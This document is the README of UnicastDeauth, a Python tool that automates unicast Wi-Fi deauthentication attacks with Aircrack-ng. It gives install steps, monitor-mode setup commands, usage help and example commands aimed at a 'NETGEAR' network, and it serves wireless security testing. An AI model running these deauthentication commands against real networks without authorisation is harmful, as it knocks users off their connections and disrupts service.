UnicastDeauth is a simple Python 3 script that automates unicast Wi-Fi deauthentication attacks. In order to do so, it identifies all access points (APs) emitting the target ESSID and all connected stations (STAs), launching Aircrack-ng's typical deauthentication for each AP-STA tuple.
As some STAs ignore broadcast deauthentication frames, I've had to grab BSSIDs from airodump-ng
to later specify them in aireplay-ng
many times, so I thought of automating this process to save some time.
git clone 'https://github.com/mamatb/UnicastDeauth.git'
pip install -r './UnicastDeauth/requirements.txt'
As with all tools using Wi-Fi cards in monitor mode, first kill all processes that could interfere and then configure the Wi-Fi interface (as root):
airmon-ng check kill
ip link set dev "${WIFI_INTERFACE}" down
iw dev "${WIFI_INTERFACE}" set monitor control
iw dev "${WIFI_INTERFACE}" set channel "${WIFI_CHANNEL}"
ip link set dev "${WIFI_INTERFACE}" up
After that just follow the help section of the script:
usage: UnicastDeauth.py [-h] -i WIFI_INTERFACE -e ESSID [-b] [-n DEAUTH_ROUNDS] [-tl APS_TARGETLIST] [-wl APS_WHITELIST]
UnicastDeauth is a simple Python 3 script that automates unicast Wi-Fi deauthentication attacks
options:
-h, --help show this help message and exit
-i WIFI_INTERFACE attacker Wi-Fi interface
-e ESSID target ESSID
-b enable broadcast deauthentication
-n DEAUTH_ROUNDS number of deauthentication rounds
-tl APS_TARGETLIST comma-separated known target APs
-wl APS_WHITELIST comma-separated APs whitelist
examples:
UnicastDeauth.py -i wlan0 -e NETGEAR -b
UnicastDeauth.py -i wlan0 -e NETGEAR -n 8
UnicastDeauth.py -i wlan0 -e NETGEAR -tl 00:11:22:33:44:00,00:11:22:33:44:55
UnicastDeauth.py -i wlan0 -e NETGEAR -wl 00:11:22:33:44:00,00:11:22:33:44:55
Please note that launching deauthentication attacks can be pretty noisy in certain environments. Also remember that they won't work if Protected Management Frames are in use.
- rsrdesarrollo for helping me understand the Frame Control field and some Scapy basics. He also runs a Wi-Fi hacking suite called pinecone that you should definitely check out if interested in Wi-Fi hacking.
- Scapy's usage documentation
- Aircrack-ng's deauthentication documentation
- mrn-cciew's blogpost "CWAP – MAC Header : Addresses"
- mrn-cciew's blogpost "802.11 Mgmt : Deauth & Disassociation Frames"